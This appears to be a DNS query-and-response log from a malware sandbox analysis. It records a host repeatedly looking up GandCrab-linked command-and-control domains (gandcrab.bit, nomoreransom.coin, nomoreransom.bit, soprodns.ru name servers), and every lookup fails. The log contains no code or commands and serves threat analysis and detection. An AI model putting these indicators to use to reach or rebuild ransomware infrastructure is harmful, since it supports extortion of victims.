Sep 1, 2022 00:00:02.160962105 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:03.267693043 CEST | 192.168.2.3 | 8.8.8.8 | 0xa990 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:03.353477001 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 1, 2022 00:00:03.371157885 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:03.391253948 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Sep 1, 2022 00:00:03.411292076 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:03.431119919 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Sep 1, 2022 00:00:04.517784119 CEST | 192.168.2.3 | 8.8.8.8 | 0x31a | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:05.099412918 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 1, 2022 00:00:05.118977070 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:05.138813972 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:05.158775091 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:05.176877975 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:06.266103029 CEST | 192.168.2.3 | 8.8.8.8 | 0xd96a | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:07.256401062 CEST | 192.168.2.3 | 8.8.8.8 | 0xd96a | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:07.412708044 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 1, 2022 00:00:07.433896065 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:07.455720901 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:07.481525898 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:07.502496004 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:08.675157070 CEST | 192.168.2.3 | 8.8.8.8 | 0xa920 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:09.687948942 CEST | 192.168.2.3 | 8.8.8.8 | 0xa920 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:09.849908113 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 1, 2022 00:00:09.867791891 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:09.889720917 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Sep 1, 2022 00:00:09.911396027 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:09.936009884 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Sep 1, 2022 00:00:11.257081985 CEST | 192.168.2.3 | 8.8.8.8 | 0xa868 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:11.291388988 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 1, 2022 00:00:11.310934067 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:11.330852985 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Sep 1, 2022 00:00:11.350931883 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Sep 1, 2022 00:00:11.371195078 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 31, 2022 23:58:04.649065018 CEST | 8.8.8.8 | 192.168.2.3 | 0x837d | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.690844059 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:04.712151051 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.738368988 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:04.757306099 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.775638103 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:07.250682116 CEST | 8.8.8.8 | 192.168.2.3 | 0xc956 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.311570883 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:07.330202103 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.351011992 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:07.383272886 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.404005051 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:14.937246084 CEST | 8.8.8.8 | 192.168.2.3 | 0x17 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:15.000052929 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:15.024588108 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:15.043148041 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:15.064032078 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:15.082518101 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:18.234639883 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb4f | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.235239029 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb4f | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.303237915 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:18.324134111 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.344474077 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:18.363096952 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.391031981 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:18.899728060 CEST | 8.8.8.8 | 192.168.2.3 | 0x17 | Server failure (2) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.646465063 CEST | 8.8.8.8 | 192.168.2.3 | 0xccdb | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.675831079 CEST | 8.8.8.8 | 192.168.2.3 | 0xccdb | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.698769093 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:21.720890999 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.744118929 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:21.768213034 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.789768934 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:24.804043055 CEST | 8.8.8.8 | 192.168.2.3 | 0xea6e | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.869385004 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:24.904200077 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.924804926 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:24.943135023 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.964257956 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:27.255918026 CEST | 8.8.8.8 | 192.168.2.3 | 0xa774 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.311678886 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:27.336108923 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.355282068 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:27.381726027 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.402415991 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:28.756191015 CEST | 8.8.8.8 | 192.168.2.3 | 0xea6e | Server failure (2) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.272780895 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf62 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.337179899 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:33.357716084 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.378457069 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:33.398911953 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.424699068 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:36.474462986 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7cb | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.549562931 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:36.570236921 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.600003004 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:36.618398905 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.638629913 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:39.644859076 CEST | 8.8.8.8 | 192.168.2.3 | 0x3115 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.735524893 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:39.759757996 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.798645973 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:39.823673964 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.854238987 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:40.380073071 CEST | 8.8.8.8 | 192.168.2.3 | 0x3115 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:42.943233967 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b60 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:42.983344078 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:43.002011061 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:43.023278952 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:43.043633938 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:43.062766075 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:43.196578026 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b60 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.470341921 CEST | 8.8.8.8 | 192.168.2.3 | 0xc71c | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.525938988 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:46.544490099 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.573009968 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:46.593744993 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.614161015 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:52.489172935 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a62 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.528167963 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:52.548969030 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.570151091 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:52.590229988 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.608671904 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:54.588342905 CEST | 8.8.8.8 | 192.168.2.3 | 0xcea6 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:54.628262997 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:54.650563002 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:54.668998957 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:54.689425945 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:54.709500074 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:56.674391985 CEST | 8.8.8.8 | 192.168.2.3 | 0x98da | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:56.730349064 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:56.748970032 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:56.769344091 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:56.792510033 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:56.812910080 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:59.266350985 CEST | 8.8.8.8 | 192.168.2.3 | 0xbf18 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:59.311882973 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:59.332475901 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:59.356389046 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:58:59.374880075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:59.394289017 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:01.399610996 CEST | 8.8.8.8 | 192.168.2.3 | 0x33a6 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:01.453686953 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:01.474419117 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:01.492651939 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:01.511037111 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:01.529551029 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:03.405114889 CEST | 8.8.8.8 | 192.168.2.3 | 0x4894 | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:03.440768003 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:03.461023092 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:03.482172012 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:03.502460003 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:03.521188974 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:06.501457930 CEST | 8.8.8.8 | 192.168.2.3 | 0x428c | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:06.537347078 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:06.560595989 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:06.581572056 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:06.599746943 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:06.617580891 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:12.252245903 CEST | 8.8.8.8 | 192.168.2.3 | 0xf42e | Name error (3) | dns1.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:12.296758890 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:12.317811966 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:12.348246098 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:12.368700981 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:12.389571905 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:14.311661005 CEST | 8.8.8.8 | 192.168.2.3 | 0x4340 | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:14.352329969 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:14.371464014 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:14.392226934 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:14.412553072 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | gandcrab.bit | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:14.435400963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | gandcrab.bit | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:15.756638050 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4b | Name error (3) | dns2.soprodns.ru | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:15.786377907 CEST | 8.8.8.8 | 192.168.2.3 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:59:15.808978081 CEST | 8.8.8.8 | 192.168.2.3 | 0x2 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:15.827245951 CEST | 8.8.8.8 | 192.168.2.3 | 0x3 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
Aug 31, 2022 23:59:15.856257915 CEST | 8.8.8.8 | 192.168.2.3 | 0x4 | Name error (3) | nomoreransom.coin | none | none | A (IP address) | IN (0x0001)
Aug 31, 2022 23:59:15.874497890 CEST | 8.8.8.8 | 192.168.2.3 | 0x5 | Name error (3) | nomoreransom.coin | none | none | 28 | IN (0x0001)
